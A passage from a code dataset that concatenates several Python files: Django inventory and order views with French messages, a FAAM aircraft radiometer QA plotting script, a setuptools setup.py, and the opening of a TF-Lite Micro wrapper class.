instance=niveau)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n1')\n else:\n form = Niveau1Form(instance=niveau)\n return render(request, 'stock/edit_n1.html', {\"niveau\":niveau, 'form':form})\n\n\n@login_required\n@permission_required('stock.add_niveau2', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n2(request):\n niveau2 = Niveau2.objects.all()\n if request.method == 'POST':\n form = Niveau2Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n2')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n2.html', {\"niveau2\":niveau2, 'form':form})\n else:\n form = Niveau2Form()\n return render(request, 'stock/create_n2.html', {\"niveau2\":niveau2, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.change_niveau2', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n2(request, id):\n niveau2 = Niveau2.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau2Form(request.POST,request.FILES, instance=niveau2)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n2')\n else:\n form = Niveau2Form(instance=niveau2)\n return render(request, 'stock/edit_n2.html', {\"niveau2\":niveau2, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.add_niveau2', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n3(request):\n niveau3 = Niveau3.objects.all()\n if request.method == 'POST':\n form = Niveau3Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n3')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n3.html', {\"niveau3\":niveau3, 'form':form})\n else:\n form = Niveau3Form()\n return render(request, 'stock/create_n3.html', {\"niveau3\":niveau3, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau3', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n3(request, id):\n niveau3 = Niveau3.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau3Form(request.POST,request.FILES, instance=niveau3)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n3')\n else:\n form = Niveau3Form(instance=niveau3)\n return render(request, 'stock/edit_n3.html', {\"niveau3\":niveau3, 'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.add_niveau4', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n4(request):\n niveau4 = Niveau4.objects.all()\n if request.method == 'POST':\n form = Niveau4Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n4')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n4.html', {\"niveau4\":niveau4, 'form':form})\n else:\n form = Niveau4Form()\n return render(request, 'stock/create_n4.html', {\"niveau4\":niveau4, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau4', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n4(request, id):\n niveau4 = Niveau4.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau4Form(request.POST,request.FILES, instance=niveau4)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n4')\n else:\n form = Niveau4Form(instance=niveau4)\n return render(request, 'stock/edit_n4.html', {\"niveau4\":niveau4, 'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.add_niveau5', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n5(request):\n niveau5 = Niveau5.objects.all()\n if request.method == 'POST':\n form = Niveau5Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n5')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n5.html', {\"niveau5\":niveau5, 'form':form})\n else:\n form = Niveau5Form()\n return render(request, 'stock/create_n5.html', {\"niveau5\":niveau5, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau5', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n5(request, id):\n niveau5 = Niveau5.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau5Form(request.POST,request.FILES, instance=niveau5)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n5')\n else:\n form = Niveau5Form(instance=niveau5)\n return render(request, 'stock/edit_n5.html', {\"niveau5\":niveau5, 'form':form})\n\n\n\n\n@login_required \n@permission_required('stock.add_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef commande(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('fournisseur')\n supplier = Client.objects.get(pk=supplier_id)\n adresse_livraison = request.POST.get('adresse_livraison')\n date_commande = request.POST.get('date_commande')\n num_commande = request.POST.get('num_commande')\n transport_id = request.POST.get('transport')\n transport = Transporteur.objects.get(pk=transport_id)\n commande = Commande.objects.create(client=supplier,\n date_commande=date_commande,\n adresse_livraison=adresse_livraison,\n num_commande=num_commande,\n transport=transport\n )\n selected_products = request.POST.getlist('articles')\n number = 0\n with transaction.atomic():\n for article_id in selected_products:\n number += 1\n quantity = int(request.POST.get(f'quantity-{number}'))\n article = Product.objects.get(id=article_id)\n # Vérifiez si la quantité demandée est disponible\n if article.stock >= quantity:\n article.stock = models.F('stock') - quantity\n article.save()\n\n LigneCommande.objects.create(commande=commande,\n article=article,\n quantite=quantity)\n\n else:\n # Si la quantité n'est pas disponible, annulez la commande et affichez un message d'erreur\n commande.delete()\n messages.error(request, f\"La quantité demandée pour '{article.name}' n'est pas disponible.\")\n\n return redirect('livraison')\n\n Livraison.objects.create(commande=commande,\n num_livraison=commande.num_commande,\n livre=False,\n )\n\n messages.success(request, 'Votre commande a été passée avec succès!')\n return redirect('livraison')\n\n else:\n articles = Product.objects.all()\n suppliers = Client.objects.all()\n transports = Transporteur.objects.all()\n prefixe = 'CMD-'\n idc = f'{Commande.objects.count()+1:05d}'\n suffixe = date.today()\n sep = '-'\n num_commande = prefixe + idc + sep + str(suffixe)\n context = {'articles': articles, \"suppliers\":suppliers, \"transports\":transports, \"num_commande\":num_commande}\n return render(request, 'stock/commande.html', context)\n\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef print_commande(request, pk):\n commande_print = Livraison.objects.get(pk=pk)\n com_id = commande_print.id\n ma_commande = get_object_or_404(Commande, id=com_id)\n article_commandes = LigneCommande.objects.filter(commande=ma_commande)\n nbr_items = article_commandes.count()\n context={\"article_commandes\":article_commandes, \"ma_commande\":ma_commande, \"nbr_items\":nbr_items}\n return render(request, 'stock/print_commande.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef print_commande2(request, pk):\n commande_print = Livraison.objects.get(pk=pk)\n com_id = commande_print.id\n ma_commande = get_object_or_404(Commande, id=com_id)\n article_commandes = LigneCommande.objects.filter(commande=ma_commande)\n context={\"article_commandes\":article_commandes, \"ma_commande\":ma_commande}\n return render(request, 'stock/print_commande2.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef livraison(request):\n livraisons = Livraison.objects.filter(livre=False).order_by('-id')\n paginator = Paginator(livraisons, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/livraison.html', context)\n\n\n@login_required\n@permission_required('stock.change_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_livraison(request, livraison_id):\n livraison = get_object_or_404(Livraison, id=livraison_id)\n commande = livraison.commande\n form = LivraisonForm(request.POST or None, instance=livraison)\n if form.is_valid():\n livraison = form.save(commit=False)\n commande.save()\n livraison.livre = True\n livraison.save()\n messages.success(request, 'Votre commande a été livré avec succès!')\n return redirect('suivi')\n return render(request, 'stock/edit_livraison.html', {'form': form, 'livraison': livraison})\n\n\n\n@login_required\n@permission_required('stock.change_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_livraison2(request, livraison_id):\n livraison = get_object_or_404(Livraison, id=livraison_id)\n return render(request, 'stock/edit_livraison2.html', {'livraison': livraison})\n\n\n\n\n\n@login_required\n@permission_required('stock.view_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef produit(request):\n articles = Product.objects.all().order_by('-id')\n paginator = Paginator(articles, 5)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/produit.html', context)\n\n@login_required\n@permission_required('stock.view_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef stock_barre(request):\n barcode = request.GET.get('barcode')\n if barcode:\n product = get_object_or_404(Product, barcode=barcode)\n data = {\n 'name': product.name,\n 'code': product.code,\n 'stock': product.stock,\n 'description': product.description,\n 'sous_contenaire': str(product.sous_contenaire),\n 'barcode': product.barcode.url if product.barcode else '',\n }\n return JsonResponse(data)\n return render(request, 'stock/stock_barre.html')\n\n\n\n@login_required\n@permission_required('stock.add_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_product(request):\n year = datetime.datetime.now().year\n code = f'ARTI-{Product.objects.count()+1:09d}-{year}'\n if request.method==\"POST\":\n form = ProductForm(request.POST)\n if form.is_valid():\n product = form.save(commit=False)\n product.code = code\n product.save()\n pro_code = form.cleaned_data.get('code')\n nom_pro = form.cleaned_data.get('name')\n messages.success(request, f\"L'élément {nom_pro} code {pro_code} ajouté avec succes !\")\n return HttpResponseRedirect('produit')\n else:\n messages.error(request, \"Veuillez verifiez svp l'article existe déja!!\")\n return render(request, 'stock/add_product.html', {\"form\":form})\n else:\n form = ProductForm(initial={'code': code})\n return render(request, 'stock/add_product.html', {\"form\":form})\n \n@login_required\n@permission_required('stock.change_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_product(request, id):\n product = get_object_or_404(Product, id=id)\n if request.method == 'POST':\n form = ProductForm(request.POST,request.FILES, instance=product)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {product.code} ok !\")\n return redirect('produit')\n else:\n form = ProductForm(instance=product)\n return render(request, 'stock/edit_product.html', {'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.delete_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef delete_product(request, id):\n product = Product.objects.get(id=id)\n if request.method=='POST':\n product.delete()\n messages.success(request, f'{product.code} supprimé !')\n return redirect(\"produit\")\n return render(request, 'stock/delete_product.html', {\"product\":product})\n\n\n\nclass SearchProductView(View):\n def get(self, request, *args, **kwargs):\n code = request.GET.get('code')\n products = Product.objects.filter(code__icontains=code)\n data = {\n 'products': list(products.values('name'))\n }\n return JsonResponse(data)\n\n\n\n \n@login_required\n@permission_required('stock.view_operation', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef stock_in(request):\n operations = Operation.objects.all().order_by('-id')\n paginator = Paginator(operations, 5)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/stock_in.html', context)\n\n\n@login_required\n@permission_required('stock.add_operation', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_stock(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('fournisseur')\n supplier = Client.objects.get(pk=supplier_id)\n operation = Operation.objects.create(fournisseur=supplier\n )\n number = 0\n selected_products = request.POST.getlist('products')\n with transaction.atomic():\n for product_id in selected_products:\n number += 1\n quantity = int(request.POST.get(f'quantity-{number}'))\n product = Product.objects.get(id=product_id)\n # Vérifiez si la quantité demandée est disponible\n if quantity >= 1:\n product.stock = models.F('stock') + quantity\n product.save()\n LigneOperation.objects.create(operation=operation,\n product=product,\n quantity=quantity)\n \n else:\n # Si la quantité n'est pas disponible, annulez la commande et affichez un message d'erreur\n operation.delete()\n messages.error(request, f\"La quantité {product.code} doit être superieure à au moin 1 \")\n\n return redirect('stock_in')\n\n \n\n messages.success(request, 'Votre stock à été mise à jour avec succès!')\n return redirect('stock_in')\n\n else:\n products = Product.objects.all()\n suppliers = Client.objects.all()\n context = {'products': products, 'suppliers': suppliers}\n return render(request, 'stock/add_stock.html', context)\n \n \n \n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def add_stock(request):\n# if request.method == 'POST':\n# selected_products = request.POST.getlist('products')\n# for product_id in selected_products:\n# quantity = int(request.POST.get('quantity'))\n# supplier_id = request.POST.get('fournisseur')\n# supplier = Client.objects.get(pk=supplier_id)\n# product = Product.objects.get(pk=product_id)\n# if quantity >= 1:\n# product.stock += quantity\n# product.save()\n# operation = Operation(\n# products=product,\n# quantity=quantity,\n# fournisseur=supplier\n# )\n# operation.save()\n# messages.success(request, f\"Le stock {product} mis à jour avec succes !\")\n# else:\n# messages.error(request, f\" veuillez verifiez la quantité saisie\")\n \n# return redirect('stock_in')\n\n# products = Product.objects.all()\n# suppliers = Client.objects.all()\n# context = {'products': products, 'suppliers': suppliers}\n# return render(request, 'stock/add_stock.html', context)\n\n \n@login_required\n@permission_required('stock.view_operation', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef operation_print(request, id):\n op_id = Operation.objects.get(id=id)\n operations_lignes = LigneOperation.objects.filter(operation_id=op_id)\n context={\"operations_lignes\":operations_lignes, \"op_id\":op_id}\n return render(request, 'stock/operation_print.html', context)\n\n\n\n\n@login_required\n@permission_required('stock.view_livraison', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef suivi(request):\n livraisons = Livraison.objects.all().filter(livre=True).order_by('-id')\n paginator = Paginator(livraisons, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/suivi.html', context)\n\n\n\n\nclass ExportProductsCSVView(View):\n \n def get(self, request, *args, **kwargs):\n products = Product.objects.all()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"products.csv\"'\n\n writer = csv.writer(response)\n writer.writerow(['ID', 'Code', 'Name', 'Stock', 'Niveau', 'Description'])\n\n for product in products:\n writer.writerow([product.id, product.code, product.name, product.stock, product.sous_contenaire, product.description])\n\n return response\n\n\n\n\nclass ExportProductsExcelView(View):\n \n def get(self, request, *args, **kwargs):\n products = Product.objects.all()\n\n workbook = openpyxl.Workbook()\n worksheet = workbook.active\n worksheet.title = \"Products\"\n\n # Écrire les en-têtes de colonne\n worksheet.cell(row=1, column=1, value=\"ID\")\n worksheet.cell(row=1, column=2, value=\"Code\")\n worksheet.cell(row=1, column=3, value=\"Name\")\n worksheet.cell(row=1, column=4, value=\"Stock\")\n worksheet.cell(row=1, column=5, value=\"Niveau\")\n worksheet.cell(row=1, column=6, value=\"Description\")\n # Écrire les données des produits\n row_num = 2\n for product in products:\n worksheet.cell(row=row_num, column=1, value=product.id)\n worksheet.cell(row=row_num, column=2, value=product.code)\n worksheet.cell(row=row_num, column=3, value=product.name)\n worksheet.cell(row=row_num, column=4, value=product.stock)\n worksheet.cell(row=row_num, column=5, value=product.sous_contenaire.name)\n worksheet.cell(row=row_num, column=6, value=product.description)\n row_num += 1\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=\"products.xlsx\"'\n workbook.save(response)\n return response\n\n\n\n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def print_label(product):\n# #Crée un objet d'imprimante USB\n# printer = Usb(0x0416, 0x5011, 0, profile=\"POS-5890\")\n# #Configure l'imprimante pour une étiquette de 50 mm de largeur\n# printer.set(\"CENTER\")\n# printer.set(\"SIZE\", 1, 1)\n# printer.set(\"GAP\", 2)\n# #Imprime le nom du produit\n# printer.text(product.name + \"\\n\")\n# #Génère le code-barres et l'imprime\n# barcode_data = generate_barcode(product.number)\n# printer.barcode(barcode_data, \"CODE128\", 64, 2, '', '')\n# #Imprime le numéro de produit et la quantité\n# printer.text(\"Product number: \" + product.number + \"\\n\")\n# printer.text(\"Quantity: \" + str(product.quantity) + \"\\n\")\n# #Coupe le papier pour terminer l'étiquette\n# printer.cut()\n# #Ferme l'objet d'imprimante USB\n# printer.close()\n# return HttpResponse(\"Label printed successfully.\")\n \n\n\n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def product_label(request, product_id):\n# #Récupère l'objet Produit correspondant à l'ID donné\n# product = Product.objects.get(pk=product_id)\n# #Imprime une étiquette pour le produit\n# print_label(product)\n# #Redirige l'utilisateur vers la page de détails du produit\n# return redirect('product_detail', product_id=product_id)\n\n\n\n@login_required\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef acces_denied(request):\n return render(request, 'stock/acces_denied.html')\n\n\n \n","repo_name":"Laurentzo1992/stock-barre","sub_path":"stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":32905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27128329295","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nQuality Assurance-Quality Check (QA-QC) plotting for the FAAM Core Broadband\nRadiometers (BBRs, pyranometers and pyrogeometers)\n\n\nLayout (landscape):\n\n -------------------------------------------\n | GPS Altitude |\n -------------------------------------------\n -------------------------------------------\n | Sun position |\n -------------------------------------------\n | |\n | Time series of longwave radiation; |\n | from pyrgeometers |\n -------------------------------------------\n -------------------------------------------\n | |\n | Time series of shortwave radiation; |\n | from pyranometers |\n -------------------------------------------\n\nCreated on Wed Apr 27 10:30:53 2016\n\n@author: Poppy Townsend\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport sys\n\nfrom general import *\nfrom utils import *\nfrom style import *\n\n\nVARIABLE_NAMES = ['Time', ## Time of measurement (seconds since midnight on start date)\n 'WOW_IND', ## Weight on wheels indicator\n 'ALT_GIN', ## GPS altitude from the GIN\n 'LON_GIN', ## GPS longitude from the GIN\n 'LAT_GIN', ## GPS latitude from the GIN\n 'PS_RVSM', ## static pressure\n 'SW_DN_C', ## Corrected downward short wave irradiance, clear dome\n 'RED_DN_C', ## Corrected downward short wave irradiance, red dome\n 'SW_UP_C', ## Corrected upward short wave irradiance, clear dome\n 'RED_UP_C', ## Corrected upward short wave irradiance, red dome\n 'IR_UP_C', ## Corrected upward longwave irradiance (CGR4)\n 'IR_DN_C', ## Corrected downward longwave irradiance (CGR4)\n 'HDG_GIN', ## Aircraft Heading from the GIN\n 'SOL_AZIM', ## Sun azimuth angle in degrees\n 'SOL_ZEN'] ## Sun zenith angle in degrees\n\n\ndef calc_sun_position(data):\n \"\"\"\n Creates time series plot for the sun position.\n 0: sun on the nose\n 90: sun starboard\n 180: sun on the tail\n 270: sun on port side\n\n :param ax: axes object\n :param data: data dictionary\n\n \"\"\"\n # sun position in reference to the aircraft heading\n # 0: sun on the nose\n # 90: sun starboard\n # 180: sun from behind\n # 270: sun on port side\n sp = data['SOL_AZIM'][:].ravel()-data['HDG_GIN'][:, 0].ravel()\n sp[sp < 0] += 360.0\n data['sun_position'] = sp\n return data\n\n\ndef plot_sun_position(ax, data):\n \"\"\"\n Creates time series plot for the sun position.\n 0: sun on the nose\n 90: sun starboard\n 180: sun on the tail\n 270: sun on port side\n\n :param ax: axes object\n :param data: data dictionary\n\n \"\"\"\n # sun position in reference to the aircraft heading\n # 0: sun on the nose\n # 90: sun starboard\n # 180: sun from behind\n # 270: sun on port side\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(),\n data['sun_position'],\n '-', lw=2, label='Sun position')\n ax.set_ylim(0, 360)\n ax.yaxis.set_ticks(np.arange(0.0, 361.0, 90.0))\n ax.legend(loc='upper right')\n plt.setp(ax.get_xticklabels(), visible=False)\n return ax\n\n\ndef calc_clearsky_irradiance(data, step=30):\n # see: http://pvlib-python.readthedocs.io/en/latest/index.html\n\n try:\n import pvlib\n PVLIB_MODULE = True\n except:\n PVLIB_MODULE = False\n sys.stdout.write('module pvlib not available ...\\n')\n return data\n\n times = mpl.dates.num2date(data['mpl_timestamp'][:, 0].ravel())\n # pvlib needs a pandas DatetimeINdex\n times = pd.DatetimeIndex(times)\n\n idata = zip(data['LAT_GIN'][::step, 0],\n data['LON_GIN'][::step, 0],\n data['ALT_GIN'][::step, 0],\n data['PS_RVSM'][::step, 0]*100., # convert to Pascal\n times[::step])\n\n n = len(idata)\n # TODO: Need to find sensible values for those two parameters\n aod700 = [0.02]*n\n precipitable_water = [0.5]*n\n\n apparent_elevation = [float(pvlib.solarposition.get_solarposition(t, lat, lon, altitude=alt)['apparent_elevation']) for lat, lon, alt, press, t in idata]\n lat, lon, alt, press, times = zip(*idata)\n dayofyear = [t.dayofyear for t in times]\n dni_extra = [pvlib.irradiance.extraradiation(d) for d in dayofyear]\n\n iput = zip(apparent_elevation, aod700,\n precipitable_water, press, dni_extra)\n\n solis = [pvlib.clearsky.simplified_solis(i[0], i[1], i[2], i[3], i[4]) for i in iput]\n # see https://firstgreenconsulting.wordpress.com/2012/04/26/differentiate-between-the-dni-dhi-and-ghi/\n ghi = [s['ghi'] for s in solis] # global horizontal irradiance\n dni = [s['dni'] for s in solis] # direct normal irradiance\n dhi = [s['dhi'] for s in solis] # diffuse horizontal irradiance\n data['clearsky_irradiance_ghi'] = ghi\n data['clearsky_irradiance_dni'] = dni\n data['clearsky_irradiance_dhi'] = dhi\n data['clearsky_irradiance_stepsize'] = step\n return data\n\n\ndef plot_altitude(ax, data):\n \"\"\"\n Time series plot of the GPS altitude\n\n :param ax: axes object\n :param data: data dictionary\n \"\"\"\n alt = data['ALT_GIN'][:, 0].ravel()/1000.\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(), alt, '-', lw=2, label='GPS alt')\n ax.set_ylabel('alt (km)')\n ax.legend(loc='upper right')\n plt.setp(ax.get_xticklabels(), visible=False)\n return ax\n\n\ndef plot_clearsky_irradiance(ax, data):\n # see: http://pvlib-python.readthedocs.io/en/latest/index.html\n\n step = data['clearsky_irradiance_stepsize']\n _ylim = ax.get_ylim()\n timestamp = data['mpl_timestamp'][::step, 0].ravel()\n ghi = data['clearsky_irradiance_ghi']\n ax.plot_date(timestamp, ghi,\n '-', color='0.3', lw=4, label='max irradiance', alpha=0.5)\n ax.set_ylim(_ylim)\n\n\ndef plot_pyranometers_ts(ax, data):\n \"\"\"\n Time series plot for the fitted pyranometers (clear & red).\n\n :param ax: axes object\n :param data: data dictionary\n \"\"\"\n pars = [('SW_DN_C', 'downward, clear dome'),\n ('RED_DN_C', 'downward, red dome'),\n ('SW_UP_C', 'upward, clear dome'),\n ('RED_UP_C', 'upward, red dome')]\n\n for p in pars:\n if p[0] in data.keys():\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(),\n data[p[0]][:, 0].ravel(),\n '-', label=p[1])\n ax.legend(loc='upper right')\n ax.text(0.05, 0.98,\n 'Pyranometers - corrected shortwave irradiance',\n axes_title_style, transform=ax.transAxes)\n ax.set_ylabel('Irradiance (W m -2)')\n ax.set_xlabel('Time (utc)')\n yl = ax.get_ylim()\n if yl[0] < -50:\n ax.set_ylim(-50, yl[1])\n if yl[1] > 1500:\n ax.set_ylim(yl[0], 1500)\n hourloc = mpl.dates.HourLocator()\n xtickformat = mpl.dates.DateFormatter('%H:%M')\n ax.xaxis.set_major_locator(hourloc)\n ax.xaxis.set_major_formatter(xtickformat)\n return ax\n\n\ndef plot_pyrgeometers_ts(ax,data):\n \"\"\"\n Creates timeseries plot for the pyrgeometers\n\n \"\"\"\n # these are yet to be fitted; will update to include when ready.\n plt.setp(ax.get_xticklabels(), visible=False)\n ax.text(0.05, 0.98,\n 'Pyrgeometers - corrected longwave irradiance',\n axes_title_style,\n transform=ax.transAxes)\n ax.set_ylabel('Irradiance (W m -2)')\n yl = ax.get_ylim()\n if yl[1] > 1500:\n ax.set_ylim(yl[0], 1500)\n ax.legend()\n return ax\n\n\ndef main(ds):\n \"\"\"\n Creates an overview plot for the BBR instruments; pyranometers and pyrogeometers.\n It calls all plotting functions and sets up axes layout.\n\n \"\"\"\n\n data = get_data(ds, VARIABLE_NAMES)\n data = calc_sun_position(data)\n data = calc_clearsky_irradiance(data)\n\n # Check if Pyrgeometer data are available\n pyrgeometers_fitted = False\n try:\n pyrgeometer_data = np.array(data['IR_DN_C'])\n pyrgeometer_data = pyrgeometer_data[(pyrgeometers_data > 0) & \\\n (pyrgeometer_data < 200)]\n\n if pyrgeometer_data.size > 3600:\n pyrgeometers_fitted = True\n else:\n pyrgeometers_fitted = False\n except:\n pass\n\n if pyrgeometers_fitted:\n gs = gridspec.GridSpec(4, 1, wspace=0.05, height_ratios=[1, 1, 4, 4])\n fig = QaQc_Figure(landscape=True).setup()\n\n fig.add_subplot(gs[3, :])\n fig.add_subplot(gs[2, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[1, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[0, :], sharex=fig.get_axes()[0])\n plot_pyranometers_ts(fig.get_axes()[0], data)\n if 'clearsky_irradiance_ghi' in data.keys():\n plot_clearsky_irradiance(fig.get_axes()[0], data)\n plot_pyrgeometers_ts(fig.get_axes()[1], data)\n plot_sun_position(fig.get_axes()[2], data)\n plot_altitude(fig.get_axes()[3], data)\n else:\n gs = gridspec.GridSpec(3, 1, wspace=0.1, height_ratios=[1, 1, 6])\n fig = QaQc_Figure(landscape=True).setup()\n\n fig.add_subplot(gs[2, :])\n fig.add_subplot(gs[1, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[0, :], sharex=fig.get_axes()[0])\n plot_pyranometers_ts(fig.get_axes()[0], data)\n if 'clearsky_irradiance_ghi' in data.keys():\n plot_clearsky_irradiance(fig.get_axes()[0], data)\n plot_sun_position(fig.get_axes()[1], data)\n plot_altitude(fig.get_axes()[2], data)\n\n # adjust ylim for GIN_ALT figure\n fig.get_axes()[-1].callbacks.connect('xlim_changed', adjust_ylim)\n\n set_suptitle(fig, ds, 'QA-Broadband Radiometers')\n\n ax = fig.get_axes()[0]\n zoom_to_flight_duration(ax, data)\n add_time_buffer(ax)\n\n # adds grey bar showing takeoff/landing and only plots the flight\n for ax in fig.get_axes():\n add_takeoff(ax, data)\n add_landing(ax, data)\n fig.canvas.draw()\n return fig\n","repo_name":"ncasuk/faampy","sub_path":"faampy/qa_plotting/bbr.py","file_name":"bbr.py","file_ext":"py","file_size_in_byte":10258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"740696367","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"dbhelpy\",\n version=\"0.6.0\",\n author=\"Angel Davila\",\n author_email=\"adavila0703@gmail.com\",\n description=\"dbhelpy is an easy to use Python library that allows you to interact with your sqlite database using \"\n \"dbhelpy methods\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/adavila0703/dbhelpy\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.8',\n)","repo_name":"adavila0703/dbhelpy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6596670441","text":"\nimport os\nimport sysconfig\nimport logging\nimport importlib\nimport copy\nimport threading\nimport inspect\nfrom typing import Union, List, Dict, Tuple\nimport numpy as np\n\nfrom mltk.core.tflite_model import TfliteModel, TfliteLayer\nfrom mltk.core.utils import get_mltk_logger\nfrom mltk.utils.python import (as_list, get_case_insensitive, import_module_at_path, append_exception_msg)\nfrom mltk.utils.path import (fullpath, get_user_setting)\nfrom ..profiling_results import ProfilingModelResults, ProfilingLayerResult\nfrom .tflite_micro_accelerator import (TfliteMicroAccelerator, PlaceholderTfliteMicroAccelerator)\nfrom .tflite_micro_model import TfliteMicroModel, TfliteMicroModelDetails\n\n\n\nclass TfliteMicro:\n \"\"\"This class wraps the TF-Lite Micro C++ library\n\n This class allows for loading a .tflite model file\n into the TF-Lite Micro (TFLM) C++ library and running inference\n using either the TFLM reference kernels or hardware accelerated kernels.\n \"\"\"\n 